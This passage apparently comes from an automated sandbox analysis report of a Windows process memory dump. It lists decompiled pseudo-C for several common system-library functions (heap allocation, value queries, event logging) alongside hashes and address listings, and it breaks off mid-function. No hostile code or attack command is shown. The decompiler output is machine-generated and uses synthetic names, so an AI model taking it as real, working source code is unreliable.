0x03664d95
0x03664d96
0x03664d98
0x03664d9a
0x03664d9f
0x03664da4
0x03664da6
0x03664da8
0x03664daf
0x03664db1
0x03664db1
0x03664daf
0x03664da6
0x03664d84
0x03664d7c
0x00000000
0x03664d74
0x036204d6
0x03664de1
0x036204dc
0x036204dc
0x036204dc
0x036204e4
0x03664deb
0x03664df1
0x03664df8
0x03664dfe
0x03664e03
0x03664e05
0x03664e17
0x03664e07
0x03664e10
0x03664e10
0x03664e1c
0x03664e1f
0x03664e35
0x03664e35
0x03664e1f
0x03664df8
0x036204f1
0x036204fa
0x03664e3f
0x03664e47
0x03664e5b
0x03664e61
0x03664e67
0x03664e69
0x03664e71
0x03664e73
0x03620500
0x03620500
0x03620500
0x036204fa
0x03620508
0x0362051d
0x0362051d
0x0362051f
0x03620524
0x00000000
0x03620524
0x03620515
0x03620517
0x03664e7a
0x03664e7c
0x00000000
0x00000000
0x03664e85
0x00000000
0x03664e85
0x00000000
0x03620517

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65b477c48d1af587904d03f58ae083e3353fa3073c4662f50bb7f605371cea8
Instruction ID: 4a1085508fc9ec4bc3074b7364c12768bf2ce3c1865d82f92192b0abb88d7053
Opcode Fuzzy Hash: e65b477c48d1af587904d03f58ae083e3353fa3073c4662f50bb7f605371cea8
Instruction Fuzzy Hash: F6915B71E00724DFDB22DB69CA44BADBFA8EF01764F0A4265E910AB3D1DB749D00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 035FC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E035FC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x36ed360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03606D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0363B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x36e7b9c; // 0x0
					_t74 = L03614620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03639650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L036177F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0363F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E036313C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L036177F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03639650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x035fc608
0x035fc615
0x035fc625
0x035fc62d
0x035fc635
0x035fc640
0x035fc680
0x035fc687
0x035fc688
0x035fc689
0x035fc694
0x035fc694
0x035fc642
0x035fc64a
0x035fc697
0x03667a25
0x03667a2b
0x03667a2e
0x03667a30
0x03667bea
0x03667bea
0x00000000
0x03667bea
0x03667a36
0x03667a43
0x03667a48
0x03667a4c
0x03667a4e
0x00000000
0x00000000
0x03667a58
0x03667a5a
0x03667a5b
0x03667a5c
0x03667a5d
0x03667a63
0x03667a64
0x03667a6a
0x03667a6c
0x03667a6e
0x036679cb
0x036679cb
0x036679ce
0x036679d0
0x03667a98
0x03667a9b
0x03667a9b
0x03667a9e
0x03667aa1
0x03667bbe
0x03667bbe
0x03667bc0
0x03667be0
0x03667be0
0x03667a01
0x03667a01
0x03667a05
0x03667a07
0x03667a15
0x03667a15
0x03667a1a
0x00000000
0x03667a1a
0x03667bc2
0x03667bc6
0x03667bc9
0x03667bcd
0x03667bcf
0x036679e6
0x036679e6
0x036679eb
0x036679eb
0x036679ef
0x036679f1
0x00000000
0x00000000
0x036679f3
0x036679f5
0x036679ff
0x036679ff
0x00000000
0x036679ff
0x036679f7
0x036679fd
0x00000000
0x00000000
0x00000000
0x036679fd
0x03667bd5
0x03667bd8
0x00000000
0x00000000
0x03667ba9
0x03667bac
0x03667bb0
0x03667bb1
0x03667bb1
0x03667bb6
0x00000000
0x03667bb6
0x03667aa7
0x03667aaa
0x00000000
0x00000000
0x03667ab2
0x03667ab3
0x03667ab5
0x03667aec
0x03667aef
0x03667b25
0x03667b28
0x03667b62
0x03667b64
0x03667b8f
0x03667b92
0x03667b96
0x03667b98
0x00000000
0x00000000
0x03667b9e
0x03667b9f
0x03667ba3
0x00000000
0x03667ba3
0x03667b66
0x03667b68
0x03667ae2
0x03667ae2
0x00000000
0x03667ae2
0x03667b6e
0x03667b72
0x03667b75
0x03667b81
0x03667b85
0x03667b87
0x00000000
0x00000000
0x03667b31
0x03667b34
0x03667b3c
0x03667b45
0x03667b46
0x03667b4f
0x03667b51
0x03667b57
0x03667b59
0x03667b59
0x00000000
0x03667b59
0x03667b77
0x00000000
0x03667b77
0x03667b2a
0x00000000
0x03667b2a
0x03667af1
0x03667af3
0x00000000
0x00000000
0x03667afb
0x03667afc
0x03667afe
0x00000000
0x00000000
0x03667b00
0x03667b03
0x00000000
0x00000000
0x03667b05
0x03667b09
0x03667b0d
0x03667b0f
0x00000000
0x00000000
0x03667b18
0x03667b1d
0x00000000
0x03667b1d
0x03667ab7
0x03667ab9
0x00000000
0x00000000
0x03667abf
0x03667ac1
0x00000000
0x00000000
0x03667ac3
0x03667ac6
0x00000000
0x00000000
0x03667ac8
0x03667acc
0x03667ad0
0x03667ad2
0x00000000
0x00000000
0x03667adb
0x00000000
0x03667adb
0x036679d6
0x036679d9
0x036679dc
0x03667a91
0x03667a94
0x00000000
0x03667a94
0x036679e2
0x00000000
0x036679e2
0x03667a74
0x03667a7a
0x00000000
0x00000000
0x03667a8a
0x03667a21
0x03667a21
0x00000000
0x03667a21
0x035fc650
0x035fc651
0x035fc656
0x035fc65c
0x035fc65d
0x035fc663
0x035fc664
0x035fc66a
0x035fc66e
0x036679c5
0x036679c7
0x00000000
0x036679c7
0x035fc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 04fbd0f9decc75077380e31298709f0cccab7dbae98b57cc618fabfa49637644
Instruction ID: 98ee2bc5cca1532698f539a3b508825421f87792034935c7be1ad7a53b4e3ba0
Opcode Fuzzy Hash: 04fbd0f9decc75077380e31298709f0cccab7dbae98b57cc618fabfa49637644
Instruction Fuzzy Hash: 9181AD756043469BDB25CE14C980A7BB3E9FF84398F1849AEED459B340E731ED41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0368B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0368B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x36e7b9c; // 0x0
				_t124 = L03614620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03639800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E036395B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E036395D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L036177F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03639910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E036395D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x36e7b9c; // 0x0
									_t92 = L03614620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03639910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E035FA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0368E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0368E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E036395B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0368b8d9
0x0368b8e4
0x00000000
0x0368b8e6
0x0368b8f3
0x0368b8f5
0x0368b8f5
0x0368b8f8
0x0368b920
0x0368b924
0x0368b936
0x0368b939
0x0368b93d
0x0368b948
0x0368b9a0
0x0368b9a0
0x0368b9a4
0x0368b9bf
0x0368b9c4
0x0368b9c6
0x0368b9cd
0x0368b9d1
0x0368bad4
0x0368bad8
0x0368bada
0x0368badc
0x0368badc
0x0368badf
0x0368bae0
0x0368bae2
0x0368bae4
0x0368baec
0x0368baee
0x0368baf0
0x0368baf0
0x0368baec
0x0368bafb
0x0368bafc
0x0368bafe
0x0368bb01
0x0368bb01
0x00000000
0x0368bb06
0x0368b9d7
0x0368b9db
0x0368b9db
0x0368b9de
0x0368b9de
0x0368b9e4
0x0368b9e7
0x0368b9ea
0x0368b9ec
0x0368b9ef
0x0368b9f3
0x0368ba1b
0x0368ba1b
0x0368ba23
0x0368ba24
0x0368ba27
0x0368ba2a
0x0368ba2b
0x0368ba2e
0x0368ba30
0x0368ba37
0x0368ba3f
0x0368ba9c
0x0368baa2
0x0368bb13
0x0368bb15
0x0368baae
0x0368baae
0x0368bab3
0x0368bab5
0x0368baba
0x0368bac8
0x0368bac8
0x0368baba
0x0368bacd
0x0368bacf
0x00000000
0x0368bacf
0x0368bb1a
0x00000000
0x0368bb1c
0x0368baa7
0x0368bb11
0x00000000
0x0368bb11
0x0368baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0368ba41
0x0368ba41
0x0368ba41
0x0368ba58
0x0368ba5d
0x0368ba62
0x00000000
0x00000000
0x0368ba64
0x0368ba67
0x0368ba68
0x0368ba69
0x0368ba6c
0x0368ba6f
0x0368ba71
0x0368ba78
0x0368ba80
0x00000000
0x00000000
0x0368ba90
0x0368ba90
0x0368ba97
0x00000000
0x0368ba97
0x0368b9f5
0x0368b9f7
0x0368b9f7
0x0368b9fa
0x0368ba03
0x0368ba07
0x0368ba0c
0x0368ba10
0x0368ba17
0x00000000
0x0368b9f7
0x0368b9a6
0x0368b9a8
0x0368b9af
0x0368b9b3
0x00000000
0x00000000
0x0368b9b9
0x00000000
0x0368b9b9
0x0368b94d
0x0368b98f
0x0368b995
0x0368b999
0x0368b960
0x0368b967
0x0368b968
0x0368b96a
0x00000000
0x0368b96a
0x0368b99b
0x0368b99e
0x00000000
0x00000000
0x00000000
0x0368b99e
0x0368b951
0x0368b954
0x0368b95a
0x0368b95e
0x0368b972
0x0368b979
0x0368b97d
0x0368b97f
0x0368b980
0x0368b982
0x0368b984
0x00000000
0x0368b984
0x00000000
0x0368b926
0x00000000
0x0368b926

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0652fceb375b0219883e57a6807aba4bca6d7d9223827d259f64bf867060e08b
Instruction ID: 38d6400d88b7f8d281f28f389ec653568f7d28991bc40c2c4cd4200c8d06a04e
Opcode Fuzzy Hash: 0652fceb375b0219883e57a6807aba4bca6d7d9223827d259f64bf867060e08b
Instruction Fuzzy Hash: F471F036200B01AFDB31EF19C944F66BBF5EF49720F18462CE6558B2A0DBB1E946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03676DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E03676DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03676B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03617D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03639AE0();
					_t87 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0367795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0367795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0367795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0367795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03614620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03676B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03676B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03676B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03676B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03617D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03639AE0();
								L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03612400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03612400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03612400( &_v52);
							}
							if(_v28 >= 0) {
								return L03612400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x03676dd4
0x03676dde
0x03676de1
0x03676de3
0x03676de6
0x03676de9
0x03676dec
0x03676def
0x03676df2
0x03676df5
0x03676dfe
0x03676e04
0x03676e09
0x03676e0d
0x03676e18
0x03676e1b
0x03676e22
0x03676e2d
0x03676e30
0x03676e36
0x03676e42
0x03676e4d
0x03676e50
0x03676e55
0x03676e5c
0x03676e6e
0x03676e5e
0x03676e67
0x03676e67
0x03676e73
0x03676e74
0x03676e77
0x03676e7c
0x03676e7d
0x03676e8e
0x03676e93
0x03676e9c
0x03676ea8
0x03676eab
0x03676eac
0x03676eb3
0x03676ecd
0x03676edc
0x03676ee2
0x03676ee5
0x03676ef2
0x03676efb
0x03676f01
0x03676f06
0x03676f0b
0x03676f11
0x03676f1a
0x03676f22
0x03676f26
0x03676f26
0x03676f33
0x03676f41
0x03676f44
0x03676f47
0x03676f54
0x03676f65
0x03676f77
0x03676f7c
0x03676f82
0x03676f91
0x03676f99
0x03676fa3
0x03676fae
0x03676fae
0x03676fba
0x03676fbb
0x03676fbc
0x03676fc1
0x03676fc2
0x03676fd3
0x03676fd8
0x03676fd8
0x03676fdf
0x03676fe8
0x03676fee
0x03676fee
0x03676ff5
0x03676ffb
0x03676ffb
0x03677004
0x00000000
0x0367700a
0x03677004
0x03676eb3
0x03676e9c
0x03677015

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: bf105089bd624a6e81133c7ccdb80e66c67d2c70f12e850130df4cfa7971c5ba
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: AB717875E00609AFCB11DFA9C984AEEFBB9FF48700F144469E504EB290DB34EA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 035F52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E035F52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0360EEF0(0x36e79a0);
					_t104 =  *0x36e8210; // 0xfa2bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0360EB70(_t93, 0x36e79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03639890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0360EEF0(0x36e79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0360EB70(0, 0x36e79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xfa2bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0362F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0360EEF0(0x36e79a0);
									__eflags =  *0x36e8210 - _t104; // 0xfa2bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x36e8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
